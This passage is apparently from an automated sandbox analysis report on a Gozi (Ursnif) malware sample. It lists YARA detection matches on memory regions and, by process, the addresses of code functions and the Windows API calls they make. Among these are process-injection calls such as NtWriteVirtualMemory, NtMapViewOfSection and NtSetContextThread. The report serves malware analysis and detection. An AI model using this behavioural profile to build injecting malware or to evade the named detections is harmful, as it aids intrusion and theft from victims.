          Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E33730_2_013E3373
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E294D0_2_013E294D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EB0840_2_013EB084
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010298C20_2_010298C2
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010460F40_2_010460F4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01035B0C0_2_01035B0C
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010353A60_2_010353A6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01027A060_2_01027A06
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010492C40_2_010492C4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010262CD0_2_010262CD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01021D4F0_2_01021D4F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01034F120_2_01034F12
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102366D0_2_0102366D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010316900_2_01031690
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0DF90_2_013A0DF9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0DF70_2_013A0DF7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049DB0843_2_049DB084
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049D294D3_2_049D294D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049D33733_2_049D3373
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0DF93_2_030E0DF9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0DF73_2_030E0DF7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C1D4F3_2_053C1D4F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D4F123_2_053D4F12
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C366D3_2_053C366D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D16903_2_053D1690
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053E60F43_2_053E60F4
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C98C23_2_053C98C2
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D5B0C3_2_053D5B0C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D53A63_2_053D53A6
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C7A063_2_053C7A06
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C62CD3_2_053C62CD
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053E92C43_2_053E92C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0DF94_2_006D0DF9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0DF74_2_006D0DF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA1D4F4_2_04AA1D4F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB16904_2_04AB1690
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA366D4_2_04AA366D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB4F124_2_04AB4F12
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AC60F44_2_04AC60F4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA98C24_2_04AA98C2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA62CD4_2_04AA62CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AC92C44_2_04AC92C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA7A064_2_04AA7A06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB53A64_2_04AB53A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB5B0C4_2_04AB5B0C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B9B0845_2_02B9B084
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B933735_2_02B93373
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B9294D5_2_02B9294D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0DF95_2_02BF0DF9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0DF75_2_02BF0DF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C21D4F5_2_04C21D4F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C316905_2_04C31690
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2366D5_2_04C2366D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C34F125_2_04C34F12
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C298C25_2_04C298C2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C460F45_2_04C460F4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C492C45_2_04C492C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C262CD5_2_04C262CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C27A065_2_04C27A06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C353A65_2_04C353A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C35B0C5_2_04C35B0C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2F83C42_2_00E2F83C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3A2AC42_2_00E3A2AC
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E29CD442_2_00E29CD4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E258F842_2_00E258F8
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E268CC42_2_00E268CC
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3C09442_2_00E3C094
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2F07442_2_00E2F074
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3284442_2_00E32844
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1C85C42_2_00E1C85C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1E02842_2_00E1E028
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2602842_2_00E26028
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2D9D442_2_00E2D9D4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3B98442_2_00E3B984
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3716042_2_00E37160
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2A12042_2_00E2A120
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E23A7C42_2_00E23A7C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2021042_2_00E20210
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E193D042_2_00E193D0
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3CB9C42_2_00E3CB9C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E21B6042_2_00E21B60
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E11B4442_2_00E11B44
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3EB2C42_2_00E3EB2C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1C30C42_2_00E1C30C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E38CE442_2_00E38CE4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E134F442_2_00E134F4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2DCBC42_2_00E2DCBC
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E24C8442_2_00E24C84
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2B40842_2_00E2B408
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1C5EC42_2_00E1C5EC
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E335C442_2_00E335C4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E24D8042_2_00E24D80
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3159C42_2_00E3159C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E35D6442_2_00E35D64
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2457C42_2_00E2457C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E3FEE842_2_00E3FEE8
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E296D042_2_00E296D0
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E236D442_2_00E236D4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E2A6A442_2_00E2A6A4
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E13EB842_2_00E13EB8
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1B60C42_2_00E1B60C
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E1BE1042_2_00E1BE10
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E40F9842_2_00E40F98
          Source: C:\Windows\System32\control.exeCode function: 42_2_00E37F9C42_2_00E37F9C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1F83C43_2_00E1F83C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2A2AC43_2_00E2A2AC
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E19CD443_2_00E19CD4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E158F843_2_00E158F8
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E168CC43_2_00E168CC
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2C09443_2_00E2C094
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1F07443_2_00E1F074
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2284443_2_00E22844
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0C85C43_2_00E0C85C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0E02843_2_00E0E028
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1602843_2_00E16028
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1D9D443_2_00E1D9D4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2B98443_2_00E2B984
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2716043_2_00E27160
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1A12043_2_00E1A120
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E13A7C43_2_00E13A7C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1021043_2_00E10210
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E093D043_2_00E093D0
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2CB9C43_2_00E2CB9C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E11B6043_2_00E11B60
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E01B4443_2_00E01B44
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2EB2C43_2_00E2EB2C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0C30C43_2_00E0C30C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E28CE443_2_00E28CE4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E034F443_2_00E034F4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1DCBC43_2_00E1DCBC
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E14C8443_2_00E14C84
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1B40843_2_00E1B408
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0C5EC43_2_00E0C5EC
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E235C443_2_00E235C4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E14D8043_2_00E14D80
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2159C43_2_00E2159C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E25D6443_2_00E25D64
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1457C43_2_00E1457C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E2FEE843_2_00E2FEE8
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E196D043_2_00E196D0
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E136D443_2_00E136D4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E1A6A443_2_00E1A6A4
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E03EB843_2_00E03EB8
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0B60C43_2_00E0B60C
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E0BE1043_2_00E0BE10
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E30F9843_2_00E30F98
          Source: C:\Windows\System32\control.exeCode function: 43_2_00E27F9C43_2_00E27F9C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083F83C45_2_0083F83C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084A2AC45_2_0084A2AC
          Source: C:\Windows\System32\control.exeCode function: 45_2_00839CD445_2_00839CD4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084C09445_2_0084C094
          Source: C:\Windows\System32\control.exeCode function: 45_2_008368CC45_2_008368CC
          Source: C:\Windows\System32\control.exeCode function: 45_2_008358F845_2_008358F8
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082E02845_2_0082E028
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083602845_2_00836028
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084284445_2_00842844
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082C85C45_2_0082C85C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083F07445_2_0083F074
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084B98445_2_0084B984
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083D9D445_2_0083D9D4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083A12045_2_0083A120
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084716045_2_00847160
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083021045_2_00830210
          Source: C:\Windows\System32\control.exeCode function: 45_2_00833A7C45_2_00833A7C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084CB9C45_2_0084CB9C
          Source: C:\Windows\System32\control.exeCode function: 45_2_008293D045_2_008293D0
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082C30C45_2_0082C30C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084EB2C45_2_0084EB2C
          Source: C:\Windows\System32\control.exeCode function: 45_2_00821B4445_2_00821B44
          Source: C:\Windows\System32\control.exeCode function: 45_2_00831B6045_2_00831B60
          Source: C:\Windows\System32\control.exeCode function: 45_2_00834C8445_2_00834C84
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083DCBC45_2_0083DCBC
          Source: C:\Windows\System32\control.exeCode function: 45_2_00848CE445_2_00848CE4
          Source: C:\Windows\System32\control.exeCode function: 45_2_008234F445_2_008234F4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083B40845_2_0083B408
          Source: C:\Windows\System32\control.exeCode function: 45_2_00834D8045_2_00834D80
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084159C45_2_0084159C
          Source: C:\Windows\System32\control.exeCode function: 45_2_008435C445_2_008435C4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082C5EC45_2_0082C5EC
          Source: C:\Windows\System32\control.exeCode function: 45_2_00845D6445_2_00845D64
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083457C45_2_0083457C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083A6A445_2_0083A6A4
          Source: C:\Windows\System32\control.exeCode function: 45_2_00823EB845_2_00823EB8
          Source: C:\Windows\System32\control.exeCode function: 45_2_008396D045_2_008396D0
          Source: C:\Windows\System32\control.exeCode function: 45_2_008336D445_2_008336D4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084FEE845_2_0084FEE8
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082B60C45_2_0082B60C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082BE1045_2_0082BE10
          Source: C:\Windows\System32\control.exeCode function: 45_2_00847F9C45_2_00847F9C
          Source: C:\Windows\System32\control.exeCode function: 45_2_00850F9845_2_00850F98
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01038A31 CreateProcessAsUserW,0_2_01038A31
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E7562 GetProcAddress,NtCreateSection,memset,0_2_013E7562
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E65B4 NtMapViewOfSection,0_2_013E65B4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_013E6C06
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EB2A9 NtQueryVirtualMemory,0_2_013EB2A9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_010309CA
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,0_2_0103D9F4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0102B0A5
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,0_2_0103C51B
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,0_2_0102D551
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01044582 NtQueryInformationProcess,0_2_01044582
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01024D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,0_2_01024D95
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,0_2_010467CD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01044FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_01044FEA
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01031635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,0_2_01031635
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103963A GetProcAddress,NtCreateSection,memset,0_2_0103963A
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01023EB7 NtMapViewOfSection,0_2_01023EB7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102D049 NtGetContextThread,RtlNtStatusToDosError,0_2_0102D049
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,0_2_0103C0B8
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,0_2_0102C0CF
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,0_2_0102B8F7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01042CA5 memset,NtQueryInformationProcess,0_2_01042CA5
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,0_2_0103CFE8
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01027E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_01027E6C
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01029690 NtQuerySystemInformation,RtlNtStatusToDosError,0_2_01029690
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A08B7 NtAllocateVirtualMemory,0_2_013A08B7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0880 NtAllocateVirtualMemory,0_2_013A0880
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0ABA NtProtectVirtualMemory,0_2_013A0ABA
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049D6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_049D6C06
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049D65B4 NtMapViewOfSection,3_2_049D65B4
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049D7562 GetProcAddress,NtCreateSection,memset,3_2_049D7562
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049DB2A9 NtQueryVirtualMemory,3_2_049DB2A9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0880 NtAllocateVirtualMemory,3_2_030E0880
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0ABA NtProtectVirtualMemory,3_2_030E0ABA
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E08B7 NtAllocateVirtualMemory,3_2_030E08B7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_053DC51B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CD551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_053CD551
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_053C4D95
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053E4582 NtQueryInformationProcess,3_2_053E4582
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053E4FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_053E4FEA
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053E67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_053E67CD
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D963A GetProcAddress,NtCreateSection,memset,3_2_053D963A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_053D1635
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C3EB7 NtMapViewOfSection,3_2_053C3EB7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,3_2_053DD9F4
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D09CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_053D09CA
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_053CB0A5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053E2CA5 memset,NtQueryInformationProcess,3_2_053E2CA5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,3_2_053DCFE8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_053C7E6C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C9690 NtQuerySystemInformation,RtlNtStatusToDosError,3_2_053C9690
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CD049 NtGetContextThread,RtlNtStatusToDosError,3_2_053CD049
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,3_2_053DC0B8
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_053CB8F7
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_053CC0CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0ABA NtProtectVirtualMemory,4_2_006D0ABA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D08B7 NtAllocateVirtualMemory,4_2_006D08B7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0880 NtAllocateVirtualMemory,4_2_006D0880
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AC4582 NtQueryInformationProcess,4_2_04AC4582
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,4_2_04AA4D95
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,4_2_04ABC51B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,4_2_04AB1635
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AC67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,4_2_04AC67CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04AAB0A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,4_2_04ABD9F4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AC2CA5 memset,NtQueryInformationProcess,4_2_04AC2CA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA9690 NtQuerySystemInformation,RtlNtStatusToDosError,4_2_04AA9690
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_04AA7E6C
